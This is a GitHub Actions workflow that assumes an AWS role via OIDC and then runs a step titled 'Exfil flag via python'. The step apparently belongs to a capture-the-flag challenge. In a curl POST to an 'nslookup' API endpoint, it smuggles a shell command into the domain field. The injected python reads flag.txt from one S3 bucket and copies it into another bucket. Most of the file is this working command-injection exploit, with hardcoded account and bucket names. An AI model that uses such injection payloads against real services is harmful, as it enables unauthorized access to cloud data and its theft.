name: AWS OIDC Test

on:
  push:
    branches:
      - corgi
  workflow_dispatch:

permissions:
  id-token: write
  contents: read

jobs:
  test-aws:
    runs-on: ubuntu-latest

    steps:
      - name: Configure AWS credentials
        uses: aws-actions/configure-aws-credentials@v4
        with:
          role-to-assume: arn:aws:iam::009661764077:role/cicdRole
          aws-region: us-east-1


      - name: Exfil flag via python
        run: |
          curl -s -X POST https://3q931syi7b.execute-api.us-east-1.amazonaws.com/dev/nslookup \
            -H "Content-Type: application/json" \
            -d "{\"domain\": \"8.8.8.8; python3 -c 'import boto3; s3=boto3.client(\\\"s3\\\"); data=s3.get_object(Bucket=\\\"codec4f26c862a321ef5\\\",Key=\\\"flag.txt\\\")[\\\"Body\\\"].read(); s3.put_object(Bucket=\\\"platform-bucket-009661764077-us-east-1\\\",Key=\\\"flag.txt\\\",Body=data)'\"}"